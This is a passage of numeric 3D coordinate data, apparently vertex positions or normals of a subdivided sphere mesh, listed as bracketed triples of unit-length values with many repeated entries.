[0.776785671711,-0.485873311758,-0.400663375854],
[0.759706020355,-0.627150595188,-0.171839639544],
[0.757998526096,-0.606988489628,-0.238753452897],
[0.715529501438,-0.665048420429,-0.213841319084],
[0.834127128124,-0.506734728813,-0.217834427953],
[0.829719662666,-0.480284929276,-0.284414708614],
[0.796284377575,-0.545040607452,-0.26241543889],
[0.752189457417,-0.582528710365,-0.308011889458],
[0.74177056551,-0.553625464439,-0.378517180681],
[0.701809465885,-0.618283927441,-0.353819847107],
[0.796284377575,-0.545040607452,-0.26241543889],
[0.752189457417,-0.582528710365,-0.308011889458],
[0.757998526096,-0.606988489628,-0.238753452897],
[0.379529476166,-0.486395716667,-0.787004828453],
[0.416404157877,-0.419940322638,-0.806385576725],
[0.346611320972,-0.436200261116,-0.830415487289],
[0.520354926586,-0.44894811511,-0.726413309574],
[0.553625464439,-0.378517180681,-0.74177056551],
[0.485873311758,-0.400663375854,-0.776785671711],
[0.450116455555,-0.352179646492,-0.820587992668],
[0.480284929276,-0.284414708614,-0.829719662666],
[0.413926929235,-0.3044308424,-0.857896447182],
[0.485873311758,-0.400663375854,-0.776785671711],
[0.450116455555,-0.352179646492,-0.820587992668],
[0.416404157877,-0.419940322638,-0.806385576725],
[0.65135627985,-0.398910075426,-0.645450055599],
[0.678621411324,-0.327040165663,-0.657660841942],
[0.618283927441,-0.353819847107,-0.701809465885],
[0.762617051601,-0.340069264174,-0.550243675709],
[0.782811582088,-0.269586592913,-0.560828924179],
[0.733673810959,-0.298754066229,-0.610302150249],
[0.700865805149,-0.256401896477,-0.665616393089],
[0.718357801437,-0.188148602843,-0.669747889042],
[0.665048420429,-0.213841319084,-0.715529501438],
[0.733673810959,-0.298754066229,-0.610302150249],
[0.700865805149,-0.256401896477,-0.665616393089],
[0.678621411324,-0.327040165663,-0.657660841942],
[0.506734728813,-0.217834427953,-0.834127128124],
[0.529480218887,-0.153434738517,-0.834331154823],
[0.468421578407,-0.174905076623,-0.866019308567],
[0.627150595188,-0.171839639544,-0.759706020355],
[0.643326640129,-0.108097285032,-0.757922053337],
[0.588087081909,-0.131048902869,-0.798110127449],
[0.548688352108,-0.091976031661,-0.830952167511],
[0.564633131027,-0.0339771322906,-0.82464236021],
[0.509656965733,-0.0549761541188,-0.858619451523],
[0.588087081909,-0.131048902869,-0.798110127449],
[0.548688352108,-0.091976031661,-0.830952167511],
[0.529480218887,-0.153434738517,-0.834331154823],
[0.618283927441,-0.353819847107,-0.701809465885],
[0.582528710365,-0.308011889458,-0.752189457417],
[0.553625464439,-0.378517180681,-0.74177056551],
[0.665048420429,-0.213841319084,-0.715529501438],
[0.627150595188,-0.171839639544,-0.759706020355],
[0.606988489628,-0.238753452897,-0.757998526096],
[0.545040607452,-0.26241543889,-0.796284377575],
[0.506734728813,-0.217834427953,-0.834127128124],
[0.480284929276,-0.284414708614,-0.829719662666],
[0.606988489628,-0.238753452897,-0.757998526096],
[0.545040607452,-0.26241543889,-0.796284377575],
[0.582528710365,-0.308011889458,-0.752189457417],
[0.550243675709,-0.762617051601,-0.340069264174],
[0.535965919495,-0.737060189247,-0.411682873964],
[0.486395716667,-0.787004828453,-0.379529476166],
[0.645450055599,-0.65135627985,-0.398910075426],
[0.628728508949,-0.619044244289,-0.470621615648],
[0.58378881216,-0.680853009224,-0.44230055809],
[0.517854511738,-0.706037700176,-0.483050197363],
[0.495975226164,-0.669751524925,-0.552667617798],
[0.44894811511,-0.726413309574,-0.520354926586],
[0.58378881216,-0.680853009224,-0.44230055809],
[0.517854511738,-0.706037700176,-0.483050197363],
[0.535965919495,-0.737060189247,-0.411682873964],
[0.726413309574,-0.520354926586,-0.44894811511],
[0.706037700176,-0.483050197363,-0.517854511738],
[0.669751524925,-0.552667617798,-0.495975226164],
[0.787004828453,-0.379529476166,-0.486395716667],
[0.762617051601,-0.340069264174,-0.550243675709],
[0.737060189247,-0.411682873964,-0.535965919495],
[0.680853009224,-0.44230055809,-0.58378881216],
[0.65135627985,-0.398910075426,-0.645450055599],
[0.619044244289,-0.470621615648,-0.628728508949],
[0.737060189247,-0.411682873964,-0.535965919495],
[0.680853009224,-0.44230055809,-0.58378881216],
[0.706037700176,-0.483050197363,-0.517854511738],
[0.470621615648,-0.628728508949,-0.619044244289],
[0.44230055809,-0.58378881216,-0.680853009224],
[0.398910075426,-0.645450055599,-0.65135627985],
[0.552667617798,-0.495975226164,-0.669751524925],
[0.520354926586,-0.44894811511,-0.726413309574],
[0.483050197363,-0.517854511738,-0.706037700176],
[0.411682873964,-0.535965919495,-0.737060189247],
[0.379529476166,-0.486395716667,-0.787004828453],
[0.340069264174,-0.550243675709,-0.762617051601],
[0.483050197363,-0.517854511738,-0.706037700176],
[0.411682873964,-0.535965919495,-0.737060189247],
[0.44230055809,-0.58378881216,-0.680853009224],
[0.669751524925,-0.552667617798,-0.495975226164],
[0.607478022575,-0.581951975822,-0.540649950504],
[0.628728508949,-0.619044244289,-0.470621615648],
[0.619044244289,-0.470621615648,-0.628728508949],
[0.552667617798,-0.495975226164,-0.669751524925],
[0.581951975822,-0.540649950504,-0.607478022575],
[0.540649950504,-0.607478022575,-0.581951975822],
[0.470621615648,-0.628728508949,-0.619044244289],
[0.495975226164,-0.669751524925,-0.552667617798],
[0.581951975822,-0.540649950504,-0.607478022575],
[0.540649950504,-0.607478022575,-0.581951975822],
[0.607478022575,-0.581951975822,-0.540649950504],
[0.475679844618,0.0,-0.8796184659],
[0.456712335348,-0.0568443164229,-0.887796461582],
[0.509656965733,-0.0549761541188,-0.858619451523],
[0.360324263573,0.0,-0.932827115059],
[0.334895044565,-0.0602079555392,-0.940329909325],
[0.398431301117,-0.0586068555713,-0.915323853493],
[0.434652328491,-0.117213711143,-0.892938017845],
[0.409316182137,-0.180623859167,-0.894335091114],
[0.468421578407,-0.174905076623,-0.866019308567],
[0.398431301117,-0.0586068555713,-0.915323853493],
[0.434652328491,-0.117213711143,-0.892938017845],
[0.456712335348,-0.0568443164229,-0.887796461582],
[0.225778326392,0.0,-0.974178731441],
[0.193714544177,-0.0626873448491,-0.979053080082],
[0.266443610191,-0.0615878328681,-0.961880862713],
[0.0770247355103,0.0,-0.997029185295],
[0.0394601933658,-0.0638479366899,-0.997179210186],
[0.117650069296,-0.0634539350867,-0.991025745869],
[0.158833146095,-0.128498718143,-0.978907585144],
[0.121444880962,-0.196501940489,-0.97295331955],
[0.199805602431,-0.193975359201,-0.960443258286],
[0.117650069296,-0.0634539350867,-0.991025745869],
[0.158833146095,-0.128498718143,-0.978907585144],
[0.193714544177,-0.0626873448491,-0.979053080082],
[0.380633711815,-0.246351331472,-0.891307473183],
[0.348686188459,-0.313436716795,-0.883275330067],
[0.413926929235,-0.3044308424,-0.857896447182],
[0.239766731858,-0.258633822203,-0.935745954514],
[0.202408134937,-0.327503234148,-0.922915279865],
[0.277958005667,-0.321246802807,-0.905284404755],
[0.313733518124,-0.380723625422,-0.869839549065],
[0.276221334934,-0.446935534477,-0.85085272789],
[0.346611320972,-0.436200261116,-0.830415487289],
[0.277958005667,-0.321246802807,-0.905284404755],
[0.313733518124,-0.380723625422,-0.869839549065],
[0.348686188459,-0.313436716795,-0.883275330067],
[0.266443610191,-0.0615878328681,-0.961880862713],
[0.306287169456,-0.123895764351,-0.943842172623],
[0.334895044565,-0.0602079555392,-0.940329909325],
[0.199805602431,-0.193975359201,-0.960443258286],
[0.239766731858,-0.258633822203,-0.935745954514],
[0.274516820908,-0.190361812711,-0.942551255226],
[0.34457308054,-0.185843646526,-0.920180141926],
[0.380633711815,-0.246351331472,-0.891307473183],
[0.409316182137,-0.180623859167,-0.894335091114],
[0.274516820908,-0.190361812711,-0.942551255226],
[0.34457308054,-0.185843646526,-0.920180141926],
[0.306287169456,-0.123895764351,-0.943842172623],
[-0.0770247355103,0.0,-0.997029185295],
[-0.117650069296,-0.0634539350867,-0.991025745869],
[-0.0394601933658,-0.0638479366899,-0.997179210186],
[-0.225778326392,0.0,-0.974178731441],
[-0.266443610191,-0.0615878328681,-0.961880862713],
[-0.193714544177,-0.0626873448491,-0.979053080082],
[-0.158833146095,-0.128498718143,-0.978907585144],
[-0.199805602431,-0.193975359201,-0.960443258286],
[-0.121444880962,-0.196501940489,-0.97295331955],
[-0.193714544177,-0.0626873448491,-0.979053080082],
[-0.158833146095,-0.128498718143,-0.978907585144],
[-0.117650069296,-0.0634539350867,-0.991025745869],
[-0.360324263573,0.0,-0.932827115059],
[-0.398431301117,-0.0586068555713,-0.915323853493],
[-0.334895044565,-0.0602079555392,-0.940329909325],
[-0.475679844618,0.0,-0.8796184659],
[-0.509656965733,-0.0549761541188,-0.858619451523],
[-0.456712335348,-0.0568443164229,-0.887796461582],
[-0.434652328491,-0.117213711143,-0.892938017845],
[-0.468421578407,-0.174905076623,-0.866019308567],
[-0.409316182137,-0.180623859167,-0.894335091114],
[-0.456712335348,-0.0568443164229,-0.887796461582],
[-0.434652328491,-0.117213711143,-0.892938017845],
[-0.398431301117,-0.0586068555713,-0.915323853493],
[-0.239766731858,-0.258633822203,-0.935745954514],
[-0.277958005667,-0.321246802807,-0.905284404755],
[-0.202408134937,-0.327503234148,-0.922915279865],
[-0.380633711815,-0.246351331472,-0.891307473183],
[-0.413926929235,-0.3044308424,-0.857896447182],
[-0.348686188459,-0.313436716795,-0.883275330067],
[-0.313733518124,-0.380723625422,-0.869839549065],
[-0.346611320972,-0.436200261116,-0.830415487289],
[-0.276221334934,-0.446935534477,-0.85085272789],
[-0.348686188459,-0.313436716795,-0.883275330067],
[-0.313733518124,-0.380723625422,-0.869839549065],
[-0.277958005667,-0.321246802807,-0.905284404755],
[-0.334895044565,-0.0602079555392,-0.940329909325],
[-0.306287169456,-0.123895764351,-0.943842172623],
[-0.266443610191,-0.0615878328681,-0.961880862713],
[-0.409316182137,-0.180623859167,-0.894335091114],
[-0.380633711815,-0.246351331472,-0.891307473183],
[-0.34457308054,-0.185843646526,-0.920180141926],
[-0.274516820908,-0.190361812711,-0.942551255226],
[-0.239766731858,-0.258633822203,-0.935745954514],
[-0.199805602431,-0.193975359201,-0.960443258286],
[-0.34457308054,-0.185843646526,-0.920180141926],
[-0.274516820908,-0.190361812711,-0.942551255226],
[-0.306287169456,-0.123895764351,-0.943842172623],
[0.236761152744,-0.510783493519,-0.826465010643],
[0.196083456278,-0.571085453033,-0.797127783298],
[0.269586592913,-0.560828924179,-0.782811582088],
[0.0809632539749,-0.524005174637,-0.847858190536],
[0.0399611219764,-0.581926107407,-0.81225925684],
[0.119124859571,-0.578244268894,-0.807120084763],
[0.154971644282,-0.62687343359,-0.763553202152],
[0.114190116525,-0.677466154099,-0.726636230946],
[0.188148602843,-0.669747889042,-0.718357801437],
[0.119124859571,-0.578244268894,-0.807120084763],
[0.154971644282,-0.62687343359,-0.763553202152],
[0.196083456278,-0.571085453033,-0.797127783298],
[-0.0809632539749,-0.524005174637,-0.847858190536],
[-0.119124859571,-0.578244268894,-0.807120084763],
[-0.0399611219764,-0.581926107407,-0.81225925684],
[-0.236761152744,-0.510783493519,-0.826465010643],
[-0.269586592913,-0.560828924179,-0.782811582088],
[-0.196083456278,-0.571085453033,-0.797127783298],
[-0.154971644282,-0.62687343359,-0.763553202152],
[-0.188148602843,-0.669747889042,-0.718357801437],
[-0.114190116525,-0.677466154099,-0.726636230946],
[-0.196083456278,-0.571085453033,-0.797127783298],
[-0.154971644282,-0.62687343359,-0.763553202152],
[-0.119124859571,-0.578244268894,-0.807120084763],
[0.0744211226702,-0.722495436668,-0.687358558178],
[0.0362210273743,-0.761889100075,-0.646693944931],
[0.108097285032,-0.757922053337,-0.643326640129],
[-0.0744211226702,-0.722495436668,-0.687358558178],
[-0.108097285032,-0.757922053337,-0.643326640129],
[-0.0362210273743,-0.761889100075,-0.646693944931],
[0.0,-0.79582041502,-0.605532705784],
[-0.0339771322906,-0.82464236021,-0.564633131027],
[0.0339771322906,-0.82464236021,-0.564633131027],
[-0.0362210273743,-0.761889100075,-0.646693944931],
[0.0,-0.79582041502,-0.605532705784],
[0.0362210273743,-0.761889100075,-0.646693944931],
[-0.0399611219764,-0.581926107407,-0.81225925684],
[0.0,-0.634539365768,-0.772890508175],
[0.0399611219764,-0.581926107407,-0.81225925684],
[-0.114190116525,-0.677466154099,-0.726636230946],
[-0.0744211226702,-0.722495436668,-0.687358558178],
[-0.0382858961821,-0.68142670393,-0.730884253979],
[0.0382858961821,-0.68142670393,-0.730884253979],
[0.0744211226702,-0.722495436668,-0.687358558178],
[0.114190116525,-0.677466154099,-0.726636230946],
[-0.0382858961821,-0.68142670393,-0.730884253979],
[0.0382858961821,-0.68142670393,-0.730884253979],
[0.0,-0.634539365768,-0.772890508175],
[-0.0394601933658,-0.0638479366899,-0.997179210186],
[0.0,-0.130150929093,-0.991494178772],
[0.0394601933658,-0.0638479366899,-0.997179210186],
[-0.121444880962,-0.196501940489,-0.97295331955],
[-0.0820460245013,-0.265506535769,-0.960611641407],
[-0.0407496243715,-0.197802826762,-0.979394435883],
[0.0407496243715,-0.197802826762,-0.979394435883],
[0.0820460245013,-0.265506535769,-0.960611641407],
[0.121444880962,-0.196501940489,-0.97295331955],
[-0.0407496243715,-0.197802826762,-0.979394435883],
[0.0407496243715,-0.197802826762,-0.979394435883],
[0.0,-0.130150929093,-0.991494178772],
[-0.202408134937,-0.327503234148,-0.922915279865],
[-0.162998497486,-0.395605653524,-0.903840482235],
[-0.123069040477,-0.33188316226,-0.935258030891],
[-0.276221334934,-0.446935534477,-0.85085272789],
[-0.236761152744,-0.510783493519,-0.826465010643],
[-0.20109423995,-0.455528259277,-0.867211103439],
[-0.122248865664,-0.461539924145,-0.878655850887],
[-0.0809632539749,-0.524005174637,-0.847858190536],
[-0.0410230122507,-0.464636415243,-0.88455080986],
[-0.20109423995,-0.455528259277,-0.867211103439],
[-0.122248865664,-0.461539924145,-0.878655850887],
[-0.162998497486,-0.395605653524,-0.903840482235],
[0.123069040477,-0.33188316226,-0.935258030891],
[0.162998497486,-0.395605653524,-0.903840482235],
[0.202408134937,-0.327503234148,-0.922915279865],
[0.0410230122507,-0.464636415243,-0.88455080986],
[0.0809632539749,-0.524005174637,-0.847858190536],
[0.122248865664,-0.461539924145,-0.878655850887],
[0.20109423995,-0.455528259277,-0.867211103439],
[0.236761152744,-0.510783493519,-0.826465010643],
[0.276221334934,-0.446935534477,-0.85085272789],
[0.122248865664,-0.461539924145,-0.878655850887],
[0.20109423995,-0.455528259277,-0.867211103439],
[0.162998497486,-0.395605653524,-0.903840482235],
[-0.123069040477,-0.33188316226,-0.935258030891],
[-0.04130198434,-0.334140062332,-0.941618084908],
[-0.0820460245013,-0.265506535769,-0.960611641407],
[-0.0410230122507,-0.464636415243,-0.88455080986],
[0.0410230122507,-0.464636415243,-0.88455080986],
[0.0,-0.400968074799,-0.916092038155],
[0.04130198434,-0.334140062332,-0.941618084908],
[0.123069040477,-0.33188316226,-0.935258030891],
[0.0820460245013,-0.265506535769,-0.960611641407],
[0.0,-0.400968074799,-0.916092038155],
[0.04130198434,-0.334140062332,-0.941618084908],
[-0.04130198434,-0.334140062332,-0.941618084908],
[-0.8796184659,-0.475679844618,0.0],
[-0.887796461582,-0.456712335348,-0.0568443164229],
[-0.858619451523,-0.509656965733,-0.0549761541188],
[-0.932827115059,-0.360324263573,0.0],
[-0.940329909325,-0.334895044565,-0.0602079555392],
[-0.915323853493,-0.398431301117,-0.0586068555713],
[-0.892938017845,-0.434652328491,-0.117213711143],
[-0.894335091114,-0.409316182137,-0.180623859167],
[-0.866019308567,-0.468421578407,-0.174905076623],
[-0.915323853493,-0.398431301117,-0.0586068555713],
[-0.892938017845,-0.434652328491,-0.117213711143],
[-0.887796461582,-0.456712335348,-0.0568443164229],
[-0.974178731441,-0.225778326392,0.0],
[-0.979053080082,-0.193714544177,-0.0626873448491],
[-0.961880862713,-0.266443610191,-0.0615878328681],
[-0.997029185295,-0.0770247355103,0.0],
[-0.997179210186,-0.0394601933658,-0.0638479366899],
[-0.991025745869,-0.117650069296,-0.0634539350867],
[-0.978907585144,-0.158833146095,-0.128498718143],
[-0.97295331955,-0.121444880962,-0.196501940489],
[-0.960443258286,-0.199805602431,-0.193975359201],
[-0.991025745869,-0.117650069296,-0.0634539350867],
[-0.978907585144,-0.158833146095,-0.128498718143],
[-0.979053080082,-0.193714544177,-0.0626873448491],
[-0.891307473183,-0.380633711815,-0.246351331472],
[-0.883275330067,-0.348686188459,-0.313436716795],
[-0.857896447182,-0.413926929235,-0.3044308424],
[-0.935745954514,-0.239766731858,-0.258633822203],
[-0.922915279865,-0.202408134937,-0.327503234148],
[-0.905284404755,-0.277958005667,-0.321246802807],
[-0.869839549065,-0.313733518124,-0.380723625422],
[-0.85085272789,-0.276221334934,-0.446935534477],
[-0.830415487289,-0.346611320972,-0.436200261116],
[-0.905284404755,-0.277958005667,-0.321246802807],
[-0.869839549065,-0.313733518124,-0.380723625422],
[-0.883275330067,-0.348686188459,-0.313436716795],
[-0.961880862713,-0.266443610191,-0.0615878328681],
[-0.943842172623,-0.306287169456,-0.123895764351],
[-0.940329909325,-0.334895044565,-0.0602079555392],
[-0.960443258286,-0.199805602431,-0.193975359201],
[-0.935745954514,-0.239766731858,-0.258633822203],
[-0.942551255226,-0.274516820908,-0.190361812711],
[-0.920180141926,-0.34457308054,-0.185843646526],
[-0.891307473183,-0.380633711815,-0.246351331472],
[-0.894335091114,-0.409316182137,-0.180623859167],
[-0.942551255226,-0.274516820908,-0.190361812711],
[-0.920180141926,-0.34457308054,-0.185843646526],
[-0.943842172623,-0.306287169456,-0.123895764351],
[-0.997029185295,0.0770247355103,0.0],
[-0.991025745869,0.117650069296,-0.0634539350867],
[-0.997179210186,0.0394601933658,-0.0638479366899],
[-0.974178731441,0.225778326392,0.0],
[-0.961880862713,0.266443610191,-0.0615878328681],
[-0.979053080082,0.193714544177,-0.0626873448491],
[-0.978907585144,0.158833146095,-0.128498718143],
[-0.960443258286,0.199805602431,-0.193975359201],
[-0.97295331955,0.121444880962,-0.196501940489],
[-0.979053080082,0.193714544177,-0.0626873448491],
[-0.978907585144,0.158833146095,-0.128498718143],
[-0.991025745869,0.117650069296,-0.0634539350867],
[-0.932827115059,0.360324263573,0.0],
[-0.915323853493,0.398431301117,-0.0586068555713],
[-0.940329909325,0.334895044565,-0.0602079555392],
[-0.8796184659,0.475679844618,0.0],
[-0.858619451523,0.509656965733,-0.0549761541188],
[-0.887796461582,0.456712335348,-0.0568443164229],
[-0.892938017845,0.434652328491,-0.117213711143],
[-0.866019308567,0.468421578407,-0.174905076623],
[-0.894335091114,0.409316182137,-0.180623859167],
[-0.887796461582,0.456712335348,-0.0568443164229],
[-0.892938017845,0.434652328491,-0.117213711143],
[-0.915323853493,0.398431301117,-0.0586068555713],
[-0.935745954514,0.239766731858,-0.258633822203],
[-0.905284404755,0.277958005667,-0.321246802807],
[-0.922915279865,0.202408134937,-0.327503234148],
[-0.891307473183,0.380633711815,-0.246351331472],
[-0.857896447182,0.413926929235,-0.3044308424],
[-0.883275330067,0.348686188459,-0.313436716795],
[-0.869839549065,0.313733518124,-0.380723625422],
[-0.830415487289,0.346611320972,-0.436200261116],
[-0.85085272789,0.276221334934,-0.446935534477],
[-0.883275330067,0.348686188459,-0.313436716795],
[-0.869839549065,0.313733518124,-0.380723625422],
[-0.905284404755,0.277958005667,-0.321246802807],
[-0.940329909325,0.334895044565,-0.0602079555392],
[-0.943842172623,0.306287169456,-0.123895764351],
[-0.961880862713,0.266443610191,-0.0615878328681],
[-0.894335091114,0.409316182137,-0.180623859167],
[-0.891307473183,0.380633711815,-0.246351331472],
[-0.920180141926,0.34457308054,-0.185843646526],
[-0.942551255226,0.274516820908,-0.190361812711],
[-0.935745954514,0.239766731858,-0.258633822203],
[-0.960443258286,0.199805602431,-0.193975359201],
[-0.920180141926,0.34457308054,-0.185843646526],
[-0.942551255226,0.274516820908,-0.190361812711],
[-0.943842172623,0.306287169456,-0.123895764351],
[-0.826465010643,-0.236761152744,-0.510783493519],
[-0.797127783298,-0.196083456278,-0.571085453033],
[-0.782811582088,-0.269586592913,-0.560828924179],
[-0.847858190536,-0.0809632539749,-0.524005174637],
[-0.81225925684,-0.0399611219764,-0.581926107407],
[-0.807120084763,-0.119124859571,-0.578244268894],
[-0.763553202152,-0.154971644282,-0.62687343359],
[-0.726636230946,-0.114190116525,-0.677466154099],
[-0.718357801437,-0.188148602843,-0.669747889042],
[-0.807120084763,-0.119124859571,-0.578244268894],
[-0.763553202152,-0.154971644282,-0.62687343359],
[-0.797127783298,-0.196083456278,-0.571085453033],
[-0.847858190536,0.0809632539749,-0.524005174637],
[-0.807120084763,0.119124859571,-0.578244268894],
[-0.81225925684,0.0399611219764,-0.581926107407],
[-0.826465010643,0.236761152744,-0.510783493519],
[-0.782811582088,0.269586592913,-0.560828924179],
[-0.797127783298,0.196083456278,-0.571085453033],
[-0.763553202152,0.154971644282,-0.62687343359],
[-0.718357801437,0.188148602843,-0.669747889042],
[-0.726636230946,0.114190116525,-0.677466154099],
[-0.797127783298,0.196083456278,-0.571085453033],
[-0.763553202152,0.154971644282,-0.62687343359],
[-0.807120084763,0.119124859571,-0.578244268894],
[-0.687358558178,-0.0744211226702,-0.722495436668],
[-0.646693944931,-0.0362210273743,-0.761889100075],
[-0.643326640129,-0.108097285032,-0.757922053337],
[-0.687358558178,0.0744211226702,-0.722495436668],
[-0.643326640129,0.108097285032,-0.757922053337],
[-0.646693944931,0.0362210273743,-0.761889100075],
[-0.605532705784,0.0,-0.79582041502],
[-0.564633131027,0.0339771322906,-0.82464236021],
[-0.564633131027,-0.0339771322906,-0.82464236021],
[-0.646693944931,0.0362210273743,-0.761889100075],
[-0.605532705784,0.0,-0.79582041502],
[-0.646693944931,-0.0362210273743,-0.761889100075],
[-0.81225925684,0.0399611219764,-0.581926107407],
[-0.772890508175,0.0,-0.634539365768],
[-0.81225925684,-0.0399611219764,-0.581926107407],
[-0.726636230946,0.114190116525,-0.677466154099],
[-0.687358558178,0.0744211226702,-0.722495436668],
[-0.730884253979,0.0382858961821,-0.68142670393],
[-0.730884253979,-0.0382858961821,-0.68142670393],
[-0.687358558178,-0.0744211226702,-0.722495436668],
[-0.726636230946,-0.114190116525,-0.677466154099],
[-0.730884253979,0.0382858961821,-0.68142670393],
[-0.730884253979,-0.0382858961821,-0.68142670393],
[-0.772890508175,0.0,-0.634539365768],
[-0.997179210186,0.0394601933658,-0.0638479366899],
[-0.991494178772,0.0,-0.130150929093],
[-0.997179210186,-0.0394601933658,-0.0638479366899],
[-0.97295331955,0.121444880962,-0.196501940489],
[-0.960611641407,0.0820460245013,-0.265506535769],
[-0.979394435883,0.0407496243715,-0.197802826762],
[-0.979394435883,-0.0407496243715,-0.197802826762],
[-0.960611641407,-0.0820460245013,-0.265506535769],
[-0.97295331955,-0.121444880962,-0.196501940489],
[-0.979394435883,0.0407496243715,-0.197802826762],
[-0.979394435883,-0.0407496243715,-0.197802826762],
[-0.991494178772,0.0,-0.130150929093],
[-0.922915279865,0.202408134937,-0.327503234148],
[-0.903840482235,0.162998497486,-0.395605653524],
[-0.935258030891,0.123069040477,-0.33188316226],
[-0.85085272789,0.276221334934,-0.446935534477],
[-0.826465010643,0.236761152744,-0.510783493519],
[-0.867211103439,0.20109423995,-0.455528259277],
[-0.878655850887,0.122248865664,-0.461539924145],
[-0.847858190536,0.0809632539749,-0.524005174637],
[-0.88455080986,0.0410230122507,-0.464636415243],
[-0.867211103439,0.20109423995,-0.455528259277],
[-0.878655850887,0.122248865664,-0.461539924145],
[-0.903840482235,0.162998497486,-0.395605653524],
[-0.935258030891,-0.123069040477,-0.33188316226],
[-0.903840482235,-0.162998497486,-0.395605653524],
[-0.922915279865,-0.202408134937,-0.327503234148],
[-0.88455080986,-0.0410230122507,-0.464636415243],
[-0.847858190536,-0.0809632539749,-0.524005174637],
[-0.878655850887,-0.122248865664,-0.461539924145],
[-0.867211103439,-0.20109423995,-0.455528259277],
[-0.826465010643,-0.236761152744,-0.510783493519],
[-0.85085272789,-0.276221334934,-0.446935534477],
[-0.878655850887,-0.122248865664,-0.461539924145],
[-0.867211103439,-0.20109423995,-0.455528259277],
[-0.903840482235,-0.162998497486,-0.395605653524],
[-0.935258030891,0.123069040477,-0.33188316226],
[-0.941618084908,0.04130198434,-0.334140062332],
[-0.960611641407,0.0820460245013,-0.265506535769],
[-0.88455080986,0.0410230122507,-0.464636415243],
[-0.88455080986,-0.0410230122507,-0.464636415243],
[-0.916092038155,0.0,-0.400968074799],
[-0.941618084908,-0.04130198434,-0.334140062332],
[-0.935258030891,-0.123069040477,-0.33188316226],
[-0.960611641407,-0.0820460245013,-0.265506535769],
[-0.916092038155,0.0,-0.400968074799],
[-0.941618084908,-0.04130198434,-0.334140062332],
[-0.941618084908,0.04130198434,-0.334140062332],
[-0.82464236021,0.564633131027,-0.0339771322906],
[-0.830952167511,0.548688352108,-0.091976031661],
[-0.858619451523,0.509656965733,-0.0549761541188],
[-0.757922053337,0.643326640129,-0.108097285032],
[-0.759706020355,0.627150595188,-0.171839639544],
[-0.798110127449,0.588087081909,-0.131048902869],
[-0.834331154823,0.529480218887,-0.153434738517],
[-0.834127128124,0.506734728813,-0.217834427953],
[-0.866019308567,0.468421578407,-0.174905076623],
[-0.798110127449,0.588087081909,-0.131048902869],
[-0.834331154823,0.529480218887,-0.153434738517],
[-0.830952167511,0.548688352108,-0.091976031661],
[-0.669747889042,0.718357801437,-0.188148602843],
[-0.665616393089,0.700865805149,-0.256401896477],
[-0.715529501438,0.665048420429,-0.213841319084],
[-0.560828924179,0.782811582088,-0.269586592913],
[-0.550243675709,0.762617051601,-0.340069264174],
[-0.610302150249,0.733673810959,-0.298754066229],
[-0.657660841942,0.678621411324,-0.327040165663],
[-0.645450055599,0.65135627985,-0.398910075426],
[-0.701809465885,0.618283927441,-0.353819847107],
[-0.610302150249,0.733673810959,-0.298754066229],
[-0.657660841942,0.678621411324,-0.327040165663],
[-0.665616393089,0.700865805149,-0.256401896477],
[-0.829719662666,0.480284929276,-0.284414708614],
[-0.820587992668,0.450116455555,-0.352179646492],
[-0.857896447182,0.413926929235,-0.3044308424],
[-0.74177056551,0.553625464439,-0.378517180681],
[-0.726413309574,0.520354926586,-0.44894811511],
[-0.776785671711,0.485873311758,-0.400663375854],
[-0.806385576725,0.416404157877,-0.419940322638],
[-0.787004828453,0.379529476166,-0.486395716667],
[-0.830415487289,0.346611320972,-0.436200261116],
[-0.776785671711,0.485873311758,-0.400663375854],
[-0.806385576725,0.416404157877,-0.419940322638],
[-0.820587992668,0.450116455555,-0.352179646492],
[-0.715529501438,0.665048420429,-0.213841319084],
[-0.757998526096,0.606988489628,-0.238753452897],
[-0.759706020355,0.627150595188,-0.171839639544],
[-0.701809465885,0.618283927441,-0.353819847107],
[-0.74177056551,0.553625464439,-0.378517180681],
[-0.752189457417,0.582528710365,-0.308011889458],
[-0.796284377575,0.545040607452,-0.26241543889],
[-0.829719662666,0.480284929276,-0.284414708614],
[-0.834127128124,0.506734728813,-0.217834427953],
[-0.752189457417,0.582528710365,-0.308011889458],
[-0.796284377575,0.545040607452,-0.26241543889],
[-0.757998526096,0.606988489628,-0.238753452897],
[-0.436200261116,0.830415487289,-0.346611320972],
[-0.419940322638,0.806385576725,-0.416404157877],
[-0.486395716667,0.787004828453,-0.379529476166],
[-0.3044308424,0.857896447182,-0.413926929235],
[-0.284414708614,0.829719662666,-0.480284929276],
[-0.352179646492,0.820587992668,-0.450116455555],
[-0.400663375854,0.776785671711,-0.485873311758],
[-0.378517180681,0.74177056551,-0.553625464439],
[-0.44894811511,0.726413309574,-0.520354926586],
[-0.352179646492,0.820587992668,-0.450116455555],
[-0.400663375854,0.776785671711,-0.485873311758],
[-0.419940322638,0.806385576725,-0.416404157877],
[-0.174905076623,0.866019308567,-0.468421578407],
[-0.153434738517,0.834331154823,-0.529480218887],
[-0.217834427953,0.834127128124,-0.506734728813],
[-0.0549761541188,0.858619451523,-0.509656965733],
[-0.0339771322906,0.82464236021,-0.564633131027],
[-0.091976031661,0.830952167511,-0.548688352108],
[-0.131048902869,0.798110127449,-0.588087081909],
[-0.108097285032,0.757922053337,-0.643326640129],
[-0.171839639544,0.759706020355,-0.627150595188],
[-0.091976031661,0.830952167511,-0.548688352108],
[-0.131048902869,0.798110127449,-0.588087081909],
[-0.153434738517,0.834331154823,-0.529480218887],
[-0.353819847107,0.701809465885,-0.618283927441],
[-0.327040165663,0.657660841942,-0.678621411324],
[-0.398910075426,0.645450055599,-0.65135627985],
[-0.213841319084,0.715529501438,-0.665048420429],
[-0.188148602843,0.669747889042,-0.718357801437],
[-0.256401896477,0.665616393089,-0.700865805149],
[-0.298754066229,0.610302150249,-0.733673810959],
[-0.269586592913,0.560828924179,-0.782811582088],
[-0.340069264174,0.550243675709,-0.762617051601],
[-0.256401896477,0.665616393089,-0.700865805149],
[-0.298754066229,0.610302150249,-0.733673810959],
[-0.327040165663,0.657660841942,-0.678621411324],
[-0.217834427953,0.834127128124,-0.506734728813],
[-0.26241543889,0.796284377575,-0.545040607452],
[-0.284414708614,0.829719662666,-0.480284929276],
[-0.171839639544,0.759706020355,-0.627150595188],
[-0.213841319084,0.715529501438,-0.665048420429],
[-0.238753452897,0.757998526096,-0.606988489628],
[-0.308011889458,0.752189457417,-0.582528710365],
[-0.353819847107,0.701809465885,-0.618283927441],
[-0.378517180681,0.74177056551,-0.553625464439],
[-0.238753452897,0.757998526096,-0.606988489628],
[-0.308011889458,0.752189457417,-0.582528710365],
[-0.26241543889,0.796284377575,-0.545040607452],
[-0.762617051601,0.340069264174,-0.550243675709],
[-0.733673810959,0.298754066229,-0.610302150249],
